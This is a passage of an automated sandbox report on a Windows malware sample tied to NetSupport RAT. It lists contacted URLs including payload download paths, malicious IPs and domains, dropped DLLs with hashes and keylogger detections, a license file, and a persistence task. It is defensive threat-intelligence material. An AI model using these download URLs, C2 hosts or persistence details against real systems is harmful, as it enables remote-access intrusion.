                                https://cycleconf.com/dwnld/2nd2_1.zip2 | AddInProcess32.exe, 00000004.00000002.2880341312.0000000001028000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                http://secure.globalsign.net/cacert/ObjectSign.crt09 | AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr | false | | high
                                http://www.pci.co.uk/support | client32.exe, 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr | false | | high
                                http://%s/testpage.htmwininet.dll | client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.dr | false | | high
                                https://cycleconf.com/dwnld/2nd2_4.zip2 | AddInProcess32.exe, 00000004.00000002.2880341312.0000000001028000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s) | client32.exe, 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr | false | | high
                                http://www.pci.co.uk/supportsupport | client32.exe, 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr | false | | high
                                http://www.crossteccorp.com | AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr, TCCTL32.DLL.4.dr | false | Avira URL Cloud: safe | unknown
                                http://ocsp.thawte.com0 | TCCTL32.DLL.4.dr, PCICL32.DLL.4.dr | false | | high
                                http://127.0.0.1RESUMEPRINTING | client32.exe, 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr | false | | high
                                http://%s/testpage.htm | client32.exe, client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.dr | false | | high
                                https://cycleconf.com/Q) | AddInProcess32.exe, 00000004.00000002.2880341312.0000000001063000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                https://cycleconf.com/dwnld/2nd2_2.zip5 | AddInProcess32.exe, 00000004.00000002.2880341312.0000000001028000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                http://geo.netsupportsoftware.com | client32.exe, 00000007.00000002.3302419274.0000000002375000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                http://127.0.0.1 | client32.exe, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr | false | Avira URL Cloud: safe | unknown
                                http://www.symauth.com/cps0( | AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.4.dr, AudioCapture.dll.4.dr, HTCTL32.DLL.4.dr, pcicapi.dll.4.dr | false | | high
                                http://geo.netsupportsoftware.com/location/loca.asplB.bg1 | client32.exe, 00000007.00000002.3301652835.00000000004FE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                http://www.globalsign.net/repository/0 | AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr | false | | high
                                http://%s/fakeurl.htm | client32.exe, client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.dr | false | | high
                                https://cycleconf.com/dwnld/2nd2_1.zipLhttps://cycleconf.com/dwnld/2nd2_2.zipLhttps://cycleconf.com/ | AddInProcess32.exe, 00000004.00000002.2880341312.0000000001020000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                http://secure.globalsign.net/cacert/PrimObject.crt0 | AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr | false | | high
                                http://geo.netsupportsoftware.com/location/loca.aspe | client32.exe, 00000007.00000003.3181897720.0000000003349000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3303235612.0000000003349000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.3182065927.0000000003349000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                http://crl.thawte.com/ThawteTimestampingCA.crl0 | TCCTL32.DLL.4.dr, PCICL32.DLL.4.dr | false | | high
                                http://www.symauth.com/rpa00 | AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, PCICHEK.DLL.4.dr, AudioCapture.dll.4.dr, HTCTL32.DLL.4.dr, pcicapi.dll.4.dr | false | | high
                                http://geo.netsupportsoftware.comlocation/loca.asp | client32.exe, 00000007.00000002.3302419274.0000000002375000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                http://www.globalsign.net/repository09 | AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr | false | | high
                                http://www.netsupportschool.com/tutor-assistant.asp11( | client32.exe, 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr | false | | high
                                http://crl.microso8 | AddInProcess32.exe, 00000004.00000002.2880341312.00000000010E9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                https://cycleconf.com/Z) | AddInProcess32.exe, 00000004.00000002.2880341312.0000000001063000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                http://geo.netsupportsoftware.com/location/loca.asph | client32.exe, 00000007.00000002.3301652835.00000000004D1000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                http://www.netsupportschool.com/tutor-assistant.asp | client32.exe, 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr | false | | high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                IP | Domain | Country | ASN | ASN Name | Malicious
                                88.210.12.58 | ganeres1.com | Russian Federation | 25308 | CITYLAN-ASRU | true
                                23.254.224.41 | cycleconf.com | United States | 54290 | HOSTWINDSUS | false
                                104.26.0.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1572207
                                                                                    Start date and time:2024-12-10 08:56:19 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 7m 59s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:10
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:Jjv9ha2GKn.exe
                                                                                    renamed because original name is a hash value
                                                                                    Original Sample Name:6ba3976f8956dceb2903dc89b9b66c3d81ceb93566b6244b58c4929a454815c0.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.rans.troj.evad.winEXE@9/27@3/3
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 84%
                                                                                    • Number of executed functions: 202
                                                                                    • Number of non-executed functions: 61
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 172.202.163.200
                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • VT rate limit hit for: Jjv9ha2GKn.exe
Time | Type | Description
02:57:13 | API Interceptor | 267x Sleep call for process: Jjv9ha2GKn.exe modified
02:59:06 | API Interceptor | 51x Sleep call for process: client32.exe modified
08:58:35 | Task Scheduler | Run new task: DNScache path: C:\Users\user\AppData\Local\DNScache\client32.exe
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
88.210.12.58 | 5q1Wm5VlqL.exe | malicious | NetSupport RAT | http://88.210.12.58/fakeurl.htm
23.254.224.41 | 5q1Wm5VlqL.exe | malicious | NetSupport RAT |
104.26.0.231 | file.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
 | Pyyidau.vbs | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
 | file.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
 | file.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
 | KC0uZWwr8p.exe | malicious | NetSupport RAT, NetSupport Downloader | geo.netsupportsoftware.com/location/loca.asp
 | KC0uZWwr8p.exe | malicious | NetSupport RAT, NetSupport Downloader | geo.netsupportsoftware.com/location/loca.asp
 | hkpqXovZtS.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
 | file.exe | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
 | qvoLvRpRbr.msi | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
 | EMX97rT0GX.msi | malicious | NetSupport RAT | geo.netsupportsoftware.com/location/loca.asp
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
geo.netsupportsoftware.com | 5q1Wm5VlqL.exe | malicious | NetSupport RAT | 104.26.1.231
 | Update.js | malicious | NetSupport RAT | 104.26.1.231
 | file.exe | malicious | NetSupport RAT | 104.26.0.231
 | file.exe | malicious | NetSupport RAT | 104.26.1.231
 | Pyyidau.vbs | malicious | NetSupport RAT | 104.26.1.231
 | Pyyidau.vbs | malicious | NetSupport RAT | 104.26.0.231
 | file.exe | malicious | NetSupport RAT | 104.26.0.231
 | file.exe | malicious | NetSupport RAT | 104.26.0.231
 | KC0uZWwr8p.exe | malicious | NetSupport RAT, NetSupport Downloader | 104.26.0.231
ganeres1.com | 5q1Wm5VlqL.exe | malicious | NetSupport RAT | 88.210.12.58
cycleconf.com | 5q1Wm5VlqL.exe | malicious | NetSupport RAT | 23.254.224.41
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
HOSTWINDSUS | 5q1Wm5VlqL.exe | malicious | NetSupport RAT | 23.254.224.41
 | xd.mpsl.elf | malicious | Mirai | 142.11.240.128
 | loligang.arm.elf | malicious | Mirai | 192.119.104.64
 | loligang.ppc.elf | malicious | Mirai | 142.11.240.155
 | ppc.elf | malicious | Mirai | 23.254.189.226
 | mpsl.elf | malicious | Mirai | 23.254.189.241
 | ppc.elf | malicious | Unknown | 192.236.246.50
 | sora.spc.elf | malicious | Mirai | 23.254.189.223
 | https://dragonfly.cloudstore.business/file/d/1iZ8GX_NkrnJvRM8atkT-YMQtlk0GchX1/view?usp=sharing_eil_m&ts=98923449 | malicious | Unknown | 104.168.157.45
 | https://0nline.hrdocuments.online/?K2dM=7XW | malicious | Unknown | 142.11.210.61
CITYLAN-ASRU | 5q1Wm5VlqL.exe | malicious | NetSupport RAT | 88.210.12.58
 | OocBsRyXoT.elf | malicious | Gafgyt, Mirai | 212.118.43.167
 | HNzkADzkE2.elf | malicious | Gafgyt, Mirai | 212.118.43.167
 | arm5.elf | malicious | Gafgyt, Mirai | 212.118.43.167
 | x86.elf | malicious | Mirai | 212.118.43.167
 | arm7.elf | malicious | Mirai | 212.118.43.167
 | file.exe | malicious | Unknown | 88.210.6.42
 | file.exe | malicious | Unknown | 88.210.6.42
 | 0tGEmgFUHk.elf | malicious | Unknown | 212.118.43.167
 | lhZOo8vhuI.elf | malicious | Unknown | 212.118.43.167
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.80.1
 | Valutazione della sicurezza IT - Azione urgente richiesta.html | malicious | Unknown | 104.16.117.116
 | file.exe | malicious | LummaC Stealer | 104.21.16.1
 | matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 104.21.84.67
 | SC3sPWT51E.exe | malicious | LummaC Stealer | 172.67.161.29
 | 4C1bAkWboc.exe | malicious | LummaC Stealer | 104.21.70.164
 | SC3sPWT51E.exe | malicious | LummaC Stealer | 172.67.162.65
 | ro7MnkIxJk.exe | malicious | LummaC | 104.21.29.214
 | DqEJwd61Uw.exe | malicious | Zhark RAT | 104.21.74.110
 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 104.21.16.1
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | n09qkE6r6n.lnk | malicious | Unknown | 23.254.224.41
 | DqEJwd61Uw.exe | malicious | Zhark RAT | 23.254.224.41
 | List of required items and services pdf.vbs | malicious | GuLoader, RHADAMANTHYS | 23.254.224.41
 | Revo.Uninstaller.Pro.v5.3.4.exe | malicious | Unknown | 23.254.224.41
 | Revo.Uninstaller.Pro.v5.3.4.exe | malicious | Unknown | 23.254.224.41
 | http://crissertaoericardo.com.br/images/document.pif.rar | malicious | GuLoader | 23.254.224.41
 | tQoSuhQIdC.msi | malicious | Unknown | 23.254.224.41
 | A8Uynu9lwi.lnk | malicious | Unknown | 23.254.224.41
 | MsmxWY8nj7.exe | malicious | RHADAMANTHYS | 23.254.224.41
 | ZAMOWIEN.EXE.exe | malicious | AgentTesla, GuLoader | 23.254.224.41
Match (Dropped File) | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\DNScache\AudioCapture.dll | 5q1Wm5VlqL.exe | malicious | NetSupport RAT |
 | KC0uZWwr8p.exe | malicious | NetSupport RAT, NetSupport Downloader |
 | KC0uZWwr8p.exe | malicious | NetSupport RAT, NetSupport Downloader |
 | hkpqXovZtS.exe | malicious | NetSupport RAT |
 | CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader |
 | CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader |
 | CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader |
 | CiscoSetup.exe | malicious | NetSupport RAT, NetSupport Downloader |
 | Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader |
 | Advanced_IP_Scanner_2.5.4594.12.exe | malicious | NetSupport RAT, NetSupport Downloader |
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):93560
                                                                                                          Entropy (8bit):6.5461580255883876
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
                                                                                                          MD5:4182F37B9BA1FA315268C669B5335DDE
                                                                                                          SHA1:2C13DA0C10638A5200FED99DCDCF0DC77A599073
                                                                                                          SHA-256:A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
                                                                                                          SHA-512:4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\AudioCapture.dll, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: 5q1Wm5VlqL.exe, Detection: malicious, Browse
                                                                                                          • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                                          • Filename: KC0uZWwr8p.exe, Detection: malicious, Browse
                                                                                                          • Filename: hkpqXovZtS.exe, Detection: malicious, Browse
                                                                                                          • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                          • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                          • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                          • Filename: CiscoSetup.exe, Detection: malicious, Browse
                                                                                                          • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                          • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..in.:n.:n.:g.6:|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@*..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):328056
                                                                                                          Entropy (8bit):6.754723001562745
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                          MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                          SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                          SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                          SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):259
                                                                                                          Entropy (8bit):5.058986594877512
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:O/oP54xRPjwxVshvydDKHMoEEjLgpW2MWMf651XZNWYpPM/iooZa8l6i7s:X0R7wxQJjjqW2MWMf65TNBPM/io98l6J
                                                                                                          MD5:1DC87146379E5E3F85FD23B25889AE2A
                                                                                                          SHA1:B750C56C757AD430C9421803649ACF9ACD15A860
                                                                                                          SHA-256:F7D80E323E7D0ED1E3DDD9B5DF08AF23DCECB47A3E289314134D4B76B3ADCAF2
                                                                                                          SHA-512:7861ABE50EEFDF4452E4BAACC4B788895610196B387B70DDEAB7BC70735391ED0A015F47EADA94A368B82F8E5CEDB5A2096E624F4A881FF067937AD159E3562C
                                                                                                          Malicious:false
                                                                                                          Preview:1200..0xdb3e38e....; NetSupport License File...; Generated on 00:48 - 19/03/2014........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=MGJFFRT466..maxslaves=100000..os2=1..product=10..serial_no=NSM301071..shrink_wrap=0..transport=0..
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18808
                                                                                                          Entropy (8bit):6.22028391196942
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                          MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                          SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                          SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                          SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3710280
                                                                                                          Entropy (8bit):6.518204410536431
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:xOHDe5Yr6tYA4S+DjdwfwBTNZaZQclSpmTIH:xOHDe5YrvS+tBQSEm
                                                                                                          MD5:AD51946B1659ED61B76FF4E599E36683
                                                                                                          SHA1:DFE2439424886E8ACF9FA3FFDE6CAAF7BFDD583E
                                                                                                          SHA-256:07A191254362664B3993479A277199F7EA5EE723B6C25803914EEDB50250ACF4
                                                                                                          SHA-512:6C30E7793F69508F6D9AA6EDCEC6930BA361628EF597E32C218E15D80586F5A86D89FCBEE63A35EAB7B1E0AE26277512F4C1A03DF7912F9B7FF9A9A858CF3962
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\DNScache\PCICL32.DLL, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\PCICL32.DLL, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h..........<G.............-..........q............q.....q......-.Q....,.|.....................Rich............PE..L.....U...........!.......... ......].......................................09......9...............................................................8.H.....7.d...................................`...@....................w..`....................text............................... ..`.rdata..............................@..@.data....%..........................@....tls.................p..............@....hhshare.............r..............@....rsrc................t..............@..@.reloc...,....7......V6.............@..B................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):391832
                                                                                                          Entropy (8bit):6.788660116314725
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:/0pwbUb486Yu0LIFZf4TktH4aY384az44lstAZPVJ4hPueU12jXvbJaS0T9XjJpX:8pwbUb48Ju0LIFZf4Tk2aY3FasNAZtJp
                                                                                                          MD5:405A7BCA024D33D7D6464129C1B58451
                                                                                                          SHA1:22B64E211D96D773C510AC82E7A73F8DEBF4E4CD
                                                                                                          SHA-256:092C3EC01883D3B4B131985B3971F7E2E523252B75F9C2470E0821505C4A3A83
                                                                                                          SHA-512:3C8D4CBF377A8BEB793C93B63D521CCD75167DEC02DA43BB91434CB6B0737CA2D61FA201F2825FD1A0CEAAE768BB53D78F737E7C412AAE83D3CDC748893F31E6
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...;..U...........!......................................................................@.............................o...T...x....0..8....................@..`E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...8....0......................@..@.reloc..&F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):55456
                                                                                                          Entropy (8bit):3.9089814840046824
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:HtvrImfzoXK6DDvvvDvpvZMt+pan/opgRl2:lImfzoXK9/o66
                                                                                                          MD5:9497AECE91E1CCC495CA26AE284600B9
                                                                                                          SHA1:A005D8CE0C1EA8901C1B4EA86C40F4925BD2C6DA
                                                                                                          SHA-256:1B63F83F06DBD9125A6983A36E0DBD64026BB4F535E97C5DF67C1563D91EFF89
                                                                                                          SHA-512:4C892E5029A707BCF73B85AC110D8078CB273632B68637E9B296A7474AB0202320FF24CF6206DE04AF08ABF087654B0D80CBECFAE824C06616C47CE93F0929C9
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\client32.exe, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..&...&...&.<.{...&...'...&.@."...&...-...&.x. ...&.Rich..&.........PE..L....Y.K............................ ........ ....@..................................'.......................................0..<....@...r..........P...P............ ..............................................X0...............................text............................... ..`.rdata....... ....... ..............@..@.idata.......0.......0..............@....rsrc....r...@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):637
                                                                                                          Entropy (8bit):5.387596614765334
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:pWqH+ZbsGSyLBa/vpVSXCxOZ7CCPfu82kJCYublu/fqILA:0qe6U8zxOLrVzusfpc
                                                                                                          MD5:5274A126EE2F7F926FB8F9AC53A57ABD
                                                                                                          SHA1:10EEB6DBD99013C7969C27D09104FCB0FFBD97DA
                                                                                                          SHA-256:B3F198F6976B2A97A0AAFD4127BF1A274C3CA388226DE13DA37F3B5976B439CA
                                                                                                          SHA-512:FCF0B3C57BD2DB6544274CB622C4855E915C74705C311E3F94749A401238EBF525FB4C9607528DEDB9944B8C682A3DA2E4BCDD9A0E6D7367241430E54AB290DB
                                                                                                          Malicious:false
